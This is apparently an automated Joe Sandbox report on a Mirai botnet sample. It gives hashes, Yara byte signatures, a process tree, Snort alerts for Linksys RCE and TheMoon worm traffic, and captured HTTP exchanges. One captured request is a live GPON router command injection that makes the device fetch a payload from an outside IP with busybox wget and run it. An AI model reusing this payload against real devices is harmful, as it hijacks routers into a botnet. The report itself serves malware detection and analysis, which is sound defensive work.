Edit tour

Linux Analysis Report
86O41HaCl5.elf

Overview

General Information

Sample name:	86O41HaCl5.elf renamed because original name is a hash value
Original sample name:	77f6dbb4a1c2a1ca81d8f59fcc8f995d.elf
Analysis ID:	1365651
MD5:	77f6dbb4a1c2a1ca81d8f59fcc8f995d
SHA1:	4ab8d151665d721c48f94c6b870c31b999a94152
SHA256:	585014ced765a6632cd3ff845187e4c46d58955728e0ccd55952993500aa1642
Tags:	32elfintelmirai
Infos:

Detection

Mirai

Score:	84
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mirai

Machine Learning detection for sample

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes the "rm" command used to delete files or directories

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1365651
Start date and time:	2023-12-21 17:03:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	86O41HaCl5.elf renamed because original name is a hash value
Original Sample Name:	77f6dbb4a1c2a1ca81d8f59fcc8f995d.elf
Detection:	MAL
Classification:	mal84.troj.linELF@0/0@0/0

Warnings

Report size exceeded maximum capacity and may have missing network information.

Runtime Messages

Command:	/tmp/86O41HaCl5.elf
PID:	6214
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	love you ~jun0
Standard Error:

Process Tree

system is lnxubuntu20

86O41HaCl5.elf (PID: 6214, Parent: 6129, MD5: 77f6dbb4a1c2a1ca81d8f59fcc8f995d) Arguments: /tmp/86O41HaCl5.elf

86O41HaCl5.elf New Fork (PID: 6215, Parent: 6214)

86O41HaCl5.elf New Fork (PID: 6216, Parent: 6215)

86O41HaCl5.elf New Fork (PID: 6217, Parent: 6215)

86O41HaCl5.elf New Fork (PID: 6218, Parent: 6215)

86O41HaCl5.elf New Fork (PID: 6220, Parent: 6215)

dash New Fork (PID: 6281, Parent: 4331)

rm (PID: 6281, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.cQn9x2yAlZ /tmp/tmp.PRPRcDblVS /tmp/tmp.P0JqeoQ9qa

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
86O41HaCl5.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
86O41HaCl5.elf	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
86O41HaCl5.elf	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x3a50:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
86O41HaCl5.elf	Linux_Trojan_Mirai_93fc3657	unknown	unknown	0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
86O41HaCl5.elf	Linux_Trojan_Mirai_804f8e7c	unknown	unknown	0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
86O41HaCl5.elf	Linux_Trojan_Mirai_99d78950	unknown	unknown	0xfc1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x10a1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1176:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1421:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x18a3:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
86O41HaCl5.elf	Linux_Trojan_Mirai_a68e498c	unknown	unknown	0x2b3:$a: 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D
86O41HaCl5.elf	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x7602:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
86O41HaCl5.elf	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x21b2:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
86O41HaCl5.elf	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x9554:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
86O41HaCl5.elf	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0x7ffe:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
86O41HaCl5.elf	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x75d2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6216.1.0000000008048000.0000000008054000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6216.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6216.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x3a50:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6216.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_93fc3657	unknown	unknown	0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
6216.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_804f8e7c	unknown	unknown	0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
6216.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_99d78950	unknown	unknown	0xfc1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x10a1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1176:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1421:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x18a3:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
6216.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_a68e498c	unknown	unknown	0x2b3:$a: 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D
6216.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x7602:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6216.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x21b2:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6216.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x9554:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6216.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0x7ffe:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6216.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x75d2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6214.1.0000000008048000.0000000008054000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6214.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6214.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x3a50:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6214.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_93fc3657	unknown	unknown	0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
6214.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_804f8e7c	unknown	unknown	0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
6214.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_99d78950	unknown	unknown	0xfc1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x10a1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1176:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1421:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x18a3:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
6214.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_a68e498c	unknown	unknown	0x2b3:$a: 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D
6214.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x7602:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6214.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x21b2:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6214.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x9554:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6214.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0x7ffe:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6214.1.0000000008048000.0000000008054000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x75d2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Click to see the 19 entries

Snort Signatures

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 104.27.95.81

Timestamp:	192.168.2.23104.27.95.813962480802027153 12/21/23-17:04:45.062109
SID:	2027153
Source Port:	39624
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt - Source IP: 192.168.2.23 - Destination IP: 35.201.98.249

Timestamp:	192.168.2.2335.201.98.2494600680802026102 12/21/23-17:05:08.065359
SID:	2026102
Source Port:	46006
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 146.19.80.251

Timestamp:	192.168.2.23146.19.80.2513499280802018132 12/21/23-17:04:52.215641
SID:	2018132
Source Port:	34992
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 175.225.155.12

Timestamp:	192.168.2.23175.225.155.124882680802018132 12/21/23-17:05:20.619925
SID:	2018132
Source Port:	48826
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt - Source IP: 192.168.2.23 - Destination IP: 104.27.95.81

Timestamp:	192.168.2.23104.27.95.813962480802026102 12/21/23-17:04:45.062109
SID:	2026102
Source Port:	39624
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 45.60.57.209

Timestamp:	192.168.2.2345.60.57.2095761280802018132 12/21/23-17:05:20.862199
SID:	2018132
Source Port:	57612
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 166.168.54.103

Timestamp:	192.168.2.23166.168.54.1034030880802018132 12/21/23-17:04:59.832371
SID:	2018132
Source Port:	40308
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 166.168.54.103

Timestamp:	192.168.2.23166.168.54.1034030880802027153 12/21/23-17:04:59.832371
SID:	2027153
Source Port:	40308
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 175.225.155.12

Timestamp:	192.168.2.23175.225.155.124882680802027153 12/21/23-17:05:20.619925
SID:	2027153
Source Port:	48826
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 45.60.57.209

Timestamp:	192.168.2.2345.60.57.2095761280802027153 12/21/23-17:05:20.862199
SID:	2027153
Source Port:	57612
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 104.27.95.81

Timestamp:	192.168.2.23104.27.95.813962480802018132 12/21/23-17:04:45.062109
SID:	2018132
Source Port:	39624
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt - Source IP: 192.168.2.23 - Destination IP: 45.60.57.209

Timestamp:	192.168.2.2345.60.57.2095761280802026102 12/21/23-17:05:20.862199
SID:	2026102
Source Port:	57612
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt - Source IP: 192.168.2.23 - Destination IP: 175.225.155.12

Timestamp:	192.168.2.23175.225.155.124882680802026102 12/21/23-17:05:20.619925
SID:	2026102
Source Port:	48826
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 216.78.17.25

Timestamp:	192.168.2.23216.78.17.256078680802018132 12/21/23-17:05:03.323507
SID:	2018132
Source Port:	60786
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt - Source IP: 192.168.2.23 - Destination IP: 166.168.54.103

Timestamp:	192.168.2.23166.168.54.1034030880802026102 12/21/23-17:04:59.832371
SID:	2026102
Source Port:	40308
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 86.115.3.230

Timestamp:	192.168.2.2386.115.3.2303869280802018132 12/21/23-17:04:59.818614
SID:	2018132
Source Port:	38692
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 136.41.4.75

Timestamp:	192.168.2.23136.41.4.755442680802018132 12/21/23-17:04:45.112267
SID:	2018132
Source Port:	54426
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 35.201.98.249

Timestamp:	192.168.2.2335.201.98.2494600680802018132 12/21/23-17:05:08.065359
SID:	2018132
Source Port:	46006
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt - Source IP: 192.168.2.23 - Destination IP: 146.19.80.251

Timestamp:	192.168.2.23146.19.80.2513499280802026102 12/21/23-17:04:52.215641
SID:	2026102
Source Port:	34992
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 216.78.17.25

Timestamp:	192.168.2.23216.78.17.256078680802027153 12/21/23-17:05:03.323507
SID:	2027153
Source Port:	60786
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt - Source IP: 192.168.2.23 - Destination IP: 216.78.17.25

Timestamp:	192.168.2.23216.78.17.256078680802026102 12/21/23-17:05:03.323507
SID:	2026102
Source Port:	60786
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 146.19.80.251

Timestamp:	192.168.2.23146.19.80.2513499280802027153 12/21/23-17:04:52.215641
SID:	2027153
Source Port:	34992
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt - Source IP: 192.168.2.23 - Destination IP: 136.41.4.75

Timestamp:	192.168.2.23136.41.4.755442680802026102 12/21/23-17:04:45.112267
SID:	2026102
Source Port:	54426
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt - Source IP: 192.168.2.23 - Destination IP: 86.115.3.230

Timestamp:	192.168.2.2386.115.3.2303869280802026102 12/21/23-17:04:59.818614
SID:	2026102
Source Port:	38692
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 86.115.3.230

Timestamp:	192.168.2.2386.115.3.2303869280802027153 12/21/23-17:04:59.818614
SID:	2027153
Source Port:	38692
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 35.201.98.249

Timestamp:	192.168.2.2335.201.98.2494600680802027153 12/21/23-17:05:08.065359
SID:	2027153
Source Port:	46006
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 136.41.4.75

Timestamp:	192.168.2.23136.41.4.755442680802027153 12/21/23-17:04:45.112267
SID:	2027153
Source Port:	54426
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 30 33 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 16:04:58 GMTServer: Netgem/8.4.27-43 (httpserver)Accept-Ranges: bytesContent-Length: 156Content-Type: text/htmlConnection: Keep-AliveKeep-Alive: timeout=15, max=98
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 688X-Iinfo: 5-35966672-0 0NNN RT(1703174726946 0) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 35 2d 33 35 39 36 36 36 37 32 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 33 31 37 34 37 32 36 39 34 36 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 32 30 31 38 31 38 34 39 38 39 37 39 35 39 36 33 35 37 26 65 64 65 74 3d 32 32 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 32 30 31 38 31 38 34 39 38 39 37 39 35 39 36 33 35 37 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=5-35966672-0%200NNN%20RT%281703174726946%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-201818498979596357&edet=22&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-201818498979596357</iframe></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 16:06:02 GMTServer: ApacheContent-Length: 0Keep-Alive: timeout=30, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 21 Dec 2023 16:06:26 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 